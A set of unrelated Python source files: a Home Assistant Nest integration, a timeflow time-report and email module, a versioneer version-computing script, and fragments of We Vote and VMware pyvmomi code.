maximum_number_to_retrieve=maximum_number_to_retrieve,
auto_followed_from_twitter_suggestion=
auto_followed_from_twitter_suggestion)
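# Hedged usage sketch (not part of We Vote): exercising organizationFollow with
# Django's test client. The URL path and organization id are assumptions for
# illustration; consult apis_v1/urls.py for the real route. The view reads
# HTTP_USER_AGENT, so the header must be supplied.
def _example_follow_organization(client, voter_device_id):
    return client.get(
        '/apis/v1/organizationFollow/',              # assumed path
        {'organization_we_vote_id': 'wv02org1234',   # placeholder id
         'voter_device_id': voter_device_id},
        HTTP_USER_AGENT='Mozilla/5.0 (example)')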
|
|
"""Support for Nest devices."""
import asyncio
import logging
from google_nest_sdm.event import EventMessage
from google_nest_sdm.exceptions import (
AuthException,
ConfigurationException,
GoogleNestException,
)
from google_nest_sdm.google_nest_subscriber import GoogleNestSubscriber
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_BINARY_SENSORS,
CONF_CLIENT_ID,
CONF_CLIENT_SECRET,
CONF_MONITORED_CONDITIONS,
CONF_SENSORS,
CONF_STRUCTURE,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed, ConfigEntryNotReady
from homeassistant.helpers import (
aiohttp_client,
config_entry_oauth2_flow,
config_validation as cv,
)
from . import api, config_flow
from .const import DATA_SDM, DATA_SUBSCRIBER, DOMAIN, OAUTH2_AUTHORIZE, OAUTH2_TOKEN
from .events import EVENT_NAME_MAP, NEST_EVENT
from .legacy import async_setup_legacy, async_setup_legacy_entry
_CONFIGURING = {}
_LOGGER = logging.getLogger(__name__)
CONF_PROJECT_ID = "project_id"
CONF_SUBSCRIBER_ID = "subscriber_id"
DATA_NEST_CONFIG = "nest_config"
DATA_NEST_UNAVAILABLE = "nest_unavailable"
NEST_SETUP_NOTIFICATION = "nest_setup"
SENSOR_SCHEMA = vol.Schema(
{vol.Optional(CONF_MONITORED_CONDITIONS): vol.All(cv.ensure_list)}
)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_CLIENT_ID): cv.string,
vol.Required(CONF_CLIENT_SECRET): cv.string,
# Required to use the new API (optional for compatibility)
vol.Optional(CONF_PROJECT_ID): cv.string,
vol.Optional(CONF_SUBSCRIBER_ID): cv.string,
# Config that only currently works on the old API
vol.Optional(CONF_STRUCTURE): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_SENSORS): SENSOR_SCHEMA,
vol.Optional(CONF_BINARY_SENSORS): SENSOR_SCHEMA,
}
)
},
extra=vol.ALLOW_EXTRA,
)
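# Hedged example (all values are placeholders): the shape of YAML-derived
# configuration that satisfies CONFIG_SCHEMA above when using the SDM API.
_EXAMPLE_NEST_CONFIG = {
    DOMAIN: {
        CONF_CLIENT_ID: "oauth-client-id",
        CONF_CLIENT_SECRET: "oauth-client-secret",
        CONF_PROJECT_ID: "device-access-project-id",
        CONF_SUBSCRIBER_ID: "projects/<gcp-project>/subscriptions/<subscription>",
    }
}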
# Platforms for SDM API
PLATFORMS = ["sensor", "camera", "climate"]
async def async_setup(hass: HomeAssistant, config: dict):
"""Set up Nest components with dispatch between old/new flows."""
hass.data[DOMAIN] = {}
if DOMAIN not in config:
return True
if CONF_PROJECT_ID not in config[DOMAIN]:
return await async_setup_legacy(hass, config)
if CONF_SUBSCRIBER_ID not in config[DOMAIN]:
_LOGGER.error("Configuration option '%s' required", CONF_SUBSCRIBER_ID)
return False
# For setup of ConfigEntry below
hass.data[DOMAIN][DATA_NEST_CONFIG] = config[DOMAIN]
project_id = config[DOMAIN][CONF_PROJECT_ID]
config_flow.NestFlowHandler.register_sdm_api(hass)
config_flow.NestFlowHandler.async_register_implementation(
hass,
config_entry_oauth2_flow.LocalOAuth2Implementation(
hass,
DOMAIN,
config[DOMAIN][CONF_CLIENT_ID],
config[DOMAIN][CONF_CLIENT_SECRET],
OAUTH2_AUTHORIZE.format(project_id=project_id),
OAUTH2_TOKEN,
),
)
return True
class SignalUpdateCallback:
"""An EventCallback invoked when new events arrive from subscriber."""
def __init__(self, hass: HomeAssistant):
"""Initialize EventCallback."""
self._hass = hass
async def async_handle_event(self, event_message: EventMessage):
"""Process an incoming EventMessage."""
if not event_message.resource_update_name:
return
device_id = event_message.resource_update_name
events = event_message.resource_update_events
if not events:
return
_LOGGER.debug("Event Update %s", events.keys())
device_registry = await self._hass.helpers.device_registry.async_get_registry()
device_entry = device_registry.async_get_device({(DOMAIN, device_id)})
if not device_entry:
return
for event in events:
event_type = EVENT_NAME_MAP.get(event)
if not event_type:
continue
message = {
"device_id": device_entry.id,
"type": event_type,
"timestamp": event_message.timestamp,
}
self._hass.bus.async_fire(NEST_EVENT, message)
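# A minimal, illustrative sketch (not part of this integration) of how a
# consumer could observe the NEST_EVENT messages fired above via the
# Home Assistant event bus. The function and handler names are hypothetical.
def _example_listen_for_nest_events(hass: HomeAssistant):
    """Attach a debug listener for Nest device events (illustrative only)."""

    def _handle_nest_event(event):
        data = event.data
        _LOGGER.debug(
            "Nest event %s for device %s at %s",
            data.get("type"),
            data.get("device_id"),
            data.get("timestamp"),
        )

    # async_listen returns an "unsubscribe" callable; keep it if the listener
    # should be detached later.
    return hass.bus.async_listen(NEST_EVENT, _handle_nest_event)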
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Set up Nest from a config entry with dispatch between old/new flows."""
if DATA_SDM not in entry.data:
return await async_setup_legacy_entry(hass, entry)
implementation = (
await config_entry_oauth2_flow.async_get_config_entry_implementation(
hass, entry
)
)
config = hass.data[DOMAIN][DATA_NEST_CONFIG]
session = config_entry_oauth2_flow.OAuth2Session(hass, entry, implementation)
auth = api.AsyncConfigEntryAuth(
aiohttp_client.async_get_clientsession(hass),
session,
config[CONF_CLIENT_ID],
config[CONF_CLIENT_SECRET],
)
subscriber = GoogleNestSubscriber(
auth, config[CONF_PROJECT_ID], config[CONF_SUBSCRIBER_ID]
)
callback = SignalUpdateCallback(hass)
subscriber.set_update_callback(callback.async_handle_event)
try:
await subscriber.start_async()
except AuthException as err:
_LOGGER.debug("Subscriber authentication error: %s", err)
raise ConfigEntryAuthFailed from err
except ConfigurationException as err:
_LOGGER.error("Configuration error: %s", err)
subscriber.stop_async()
return False
except GoogleNestException as err:
if DATA_NEST_UNAVAILABLE not in hass.data[DOMAIN]:
_LOGGER.error("Subscriber error: %s", err)
hass.data[DOMAIN][DATA_NEST_UNAVAILABLE] = True
subscriber.stop_async()
raise ConfigEntryNotReady from err
try:
await subscriber.async_get_device_manager()
except GoogleNestException as err:
if DATA_NEST_UNAVAILABLE not in hass.data[DOMAIN]:
_LOGGER.error("Device manager error: %s", err)
hass.data[DOMAIN][DATA_NEST_UNAVAILABLE] = True
subscriber.stop_async()
raise ConfigEntryNotReady from err
hass.data[DOMAIN].pop(DATA_NEST_UNAVAILABLE, None)
hass.data[DOMAIN][DATA_SUBSCRIBER] = subscriber
for platform in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(entry, platform)
)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Unload a config entry."""
if DATA_SDM not in entry.data:
# Legacy API
return True
_LOGGER.debug("Stopping nest subscriber")
subscriber = hass.data[DOMAIN][DATA_SUBSCRIBER]
subscriber.stop_async()
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(entry, platform)
for platform in PLATFORMS
]
)
)
if unload_ok:
hass.data[DOMAIN].pop(DATA_SUBSCRIBER)
hass.data[DOMAIN].pop(DATA_NEST_UNAVAILABLE, None)
return unload_ok
|
|
import datetime as dt
import smtplib
from collections import defaultdict
from collections import OrderedDict
from timeflow.settings import Settings
from timeflow.utils import DATE_FORMAT
from timeflow.utils import DATETIME_FORMAT
from timeflow.utils import calc_time_diff
from timeflow.utils import date_begins
from timeflow.utils import date_ends
from timeflow.utils import format_duration_long
from timeflow.utils import format_duration_short
from timeflow.utils import get_time
from timeflow.utils import parse_lines
from timeflow.utils import strip_log
def get_total_stats_times(work_time, slack_time, today_work_time):
"""
    Returns string output for total time spent working and slacking
"""
output = 'Work: {}\n'.format(format_duration_short(sum(work_time)))
output += 'Slack: {}'.format(format_duration_short(sum(slack_time)))
if today_work_time:
today_hours, today_minutes = get_time(today_work_time)
output += '\n\nToday working for: {}'.format(
format_duration_short(today_work_time)
)
return output
def create_report(report_dict):
"""
Returns string output for stats report
"""
output = ""
report_dict = OrderedDict(sorted(report_dict.items()))
for project in report_dict:
project_output = "{}:\n".format(project)
project_report = report_dict[project]
total_seconds = 0
for log in project_report:
log_seconds = project_report[log]
total_seconds += log_seconds
# if log is empty - just state the project name
if not log:
log = project
project_output += " {time}: {log}\n".format(
time=format_duration_long(log_seconds),
log=log
)
project_output += " Total: {time}\n".format(
time=format_duration_long(total_seconds),
)
output += project_output
output += '\n'
# remove trailing newlines as they may add up in the pipeline
return output.strip('\n')
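# Minimal usage sketch for create_report(); the project name, log messages and
# second counts below are invented purely for illustration.
def _example_create_report_usage():
    """Illustrative only: shows the input shape create_report() expects."""
    example = {
        'timeflow': {
            'implement daily report': 3600,
            'fix report formatting': 900,
        },
    }
    # One block per project: a line per log message plus a "Total:" line,
    # with durations formatted via format_duration_long().
    return create_report(example)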
def create_full_report(work_report_dict, slack_report_dict):
"""
    Returns a report covering both work and slack
"""
output = ""
work_report = create_report(work_report_dict)
slack_report = create_report(slack_report_dict)
output += "{:-^67s}\n".format(" WORK ")
output += work_report
output += "\n" # I want empty line between work and slack report
output += "{:-^67s}\n".format(" SLACK ")
output += slack_report
return output
def create_report_as_gtimelog(report_dict, literal_time_range=''):
"""
    Returns string output for a report generated in the gtimelog style
"""
output = ""
project_totals_output = ""
output += "{}{}\n".format(" " * 64, "time")
report_dict = OrderedDict(sorted(report_dict.items()))
total_seconds = 0
for project in report_dict:
total_project_seconds = 0
project_report = report_dict[project]
for log in project_report:
entry = "{}: {}".format(project, log)
seconds = project_report[log]
time_string = format_duration_short(seconds)
output += "{:62s} {}\n".format(entry, time_string)
total_project_seconds += seconds
project_totals_output += "{:62s} {}\n".format(project, format_duration_short(total_project_seconds))
total_seconds += total_project_seconds
output += "\n"
output += "Total work done{}{}: {}\n\n".format(
' ' if literal_time_range else '', # add space if time range exists
literal_time_range,
format_duration_short(total_seconds)
)
output += "By category:\n\n"
output += project_totals_output
return output
def calculate_stats(lines, date_from, date_to, today=False):
work_time = []
slack_time = []
today_work_time = None
line_begins = date_begins(lines, date_from)
line_ends = date_ends(lines, date_to)
date_not_found = (line_begins is None or line_ends < line_begins)
if date_not_found:
return work_time, slack_time, today_work_time
data = parse_lines()
for i, line in enumerate(data[line_begins:line_ends + 1]):
# if we got to the last line - stop
if line_begins + i + 1 > line_ends:
break
next_line = data[line_begins + i + 1]
line_date = line.date
next_line_date = next_line.date
        # if it's a day switch, skip this cycle
if line_date != next_line_date:
continue
if next_line.is_slack:
slack_time.append(calc_time_diff(line, next_line))
else:
work_time.append(calc_time_diff(line, next_line))
if today:
today_start_time = dt.datetime.strptime(
"{} {}".format(data[line_begins].date, data[line_begins].time),
DATETIME_FORMAT
)
today_work_time = (dt.datetime.now() - today_start_time).seconds
return work_time, slack_time, today_work_time
def calculate_report(lines, date_from, date_to,
filter_projects=[],
exclude_projects=[]):
"""Creates and returns report dictionaries
Report dicts have form like this:
{<Project>: {<log_message>: <accumulative time>},
{<log_message1>: <accumulative time1>}}
"""
# XXX: need to check that same project is not in both: filters and excludes
work_dict = defaultdict(lambda: defaultdict(dict))
slack_dict = defaultdict(lambda: defaultdict(dict))
line_begins = date_begins(lines, date_from)
line_ends = date_ends(lines, date_to)
date_not_found = (line_begins is None or line_ends < line_begins)
if date_not_found:
return work_dict, slack_dict
data = parse_lines()
for i, line in enumerate(data[line_begins:line_ends + 1]):
# if we got to the last line - stop
if line_begins + i + 1 > line_ends:
break
next_line = data[line_begins + i + 1]
line_date = line.date
next_line_date = next_line.date
        # if it's a day switch, skip this cycle
if line_date != next_line_date:
continue
time_diff = calc_time_diff(line, next_line)
project = strip_log(next_line.project)
if project_should_be_in_report(project, filter_projects, exclude_projects):
log = strip_log(next_line.log)
if next_line.is_slack:
# if log message is identical add time_diff
# to total time of the log
if slack_dict[project][log]:
total_time = slack_dict[project][log]
total_time += time_diff
slack_dict[project][log] = total_time
else:
slack_dict[project][log] = time_diff
else:
if work_dict[project][log]:
total_time = work_dict[project][log]
total_time += time_diff
work_dict[project][log] = total_time
else:
work_dict[project][log] = time_diff
return work_dict, slack_dict
def project_should_be_in_report(project, filters, excludes):
if project in filters:
return True
elif project in excludes:
return False
elif filters == []:
return True
    elif excludes == []:
        return False
    # project matched neither list while both filters and excludes were given
    return False
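# Behaviour sketch for project_should_be_in_report() (project names invented):
#   project_should_be_in_report('api', filters=['api'], excludes=[])  -> True
#   project_should_be_in_report('api', filters=[], excludes=['api'])  -> False
#   project_should_be_in_report('api', filters=[], excludes=[])       -> True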
def get_daily_report_subject(day, person):
"""
Returns subject string for daily report email
`day:datetime.date` - date of the day we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
# it's possible to use strftime('%a'), but it's locale sensitive,
# and I do not want this
weekday_names = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
calendar_time = "{weekday}, week {week:02}".format(
        # isocalendar()[2] is a 1-based weekday (Mon == 1), hence the -1
        weekday=weekday_names[day.isocalendar()[2] - 1],
week=day.isocalendar()[1],
)
subject = "{day} report for {person} ({calendar_time})".format(
day=day.strftime(DATE_FORMAT),
person=person,
calendar_time=calendar_time
)
return subject
def get_weekly_report_subject(week_day, person):
"""
Returns subject string for weekly report email
`week_day:datetime.date` - any date for the week we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
calendar_time = "week {:02}".format(week_day.isocalendar()[1])
subject = "Weekly report for {person} ({calendar_time})".format(
person=person,
calendar_time=calendar_time
)
return subject
def get_monthly_report_subject(month_day, person):
"""
Returns subject string for monthly report email
`month_day:datetime.date` - any date for the month we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
calendar_time = "{year}/{month:02}".format(
year=month_day.year,
month=month_day.month
)
subject = "Monthly report for {person} ({calendar_time})".format(
person=person,
calendar_time=calendar_time
)
return subject
def get_custom_range_report_subject(date_from, date_to, person):
subject = "Custom date range report for {person} ({_from:%Y-%m-%d} - {to:%Y-%m-%d})".format(
person=person,
_from=date_from,
to=date_to,
)
return subject
def email_report(date_from, date_to, report, email_time_range=None):
settings = Settings()
settings.load()
sender = settings.email_address
receivers = [settings.activity_email]
date_from_time_range = dt.datetime.strptime(date_from, DATE_FORMAT)
subject = ''
if email_time_range == 'day':
subject = get_daily_report_subject(date_from_time_range, settings.name)
elif email_time_range == 'week':
subject = get_weekly_report_subject(date_from_time_range, settings.name)
elif email_time_range == 'month':
subject = get_monthly_report_subject(date_from_time_range, settings.name)
else:
# convert date strings to datetime objects
_date_from = dt.datetime.strptime(date_from, DATE_FORMAT)
_date_to = dt.datetime.strptime(date_to, DATE_FORMAT)
subject = get_custom_range_report_subject(_date_from, _date_to, settings.name)
full_subject = "[Activity] {}".format(subject)
message = (
"From: {}\n"
"To: {}\n"
"Subject: {}\n\n"
"{}"
).format(sender, ", ".join(receivers), full_subject, report)
try:
conn = smtplib.SMTP(settings.smtp_server, settings.smtp_port)
conn.ehlo()
conn.starttls()
conn.login(settings.email_user, settings.email_password)
conn.sendmail(sender, receivers, message)
print("Successfully sent email")
except smtplib.SMTPException:
print("Error: unable to send email")
|
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = ""
cfg.versionfile_source = "stable_world/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
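# Worked example (pieces invented): a checkout 3 commits past tag "1.2.0"
# with local modifications renders as a PEP 440 local version.
def _example_render_pep440():
    """Illustrative only; not called by versioneer itself."""
    pieces = {"closest-tag": "1.2.0", "distance": 3,
              "short": "abc1234", "dirty": True}
    assert render_pep440(pieces) == "1.2.0+3.gabc1234.dirty"
    return render_pep440(pieces)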
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
    Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
    Like 'git describe --tags --dirty --always --long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
|
|
# VMware vSphere Python SDK
# Copyright (c) 2008-2021 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
## @file connect.py
## @brief Connect to a VMOMI ServiceInstance.
##
## Detailed description (for Doxygen goes here)
"""
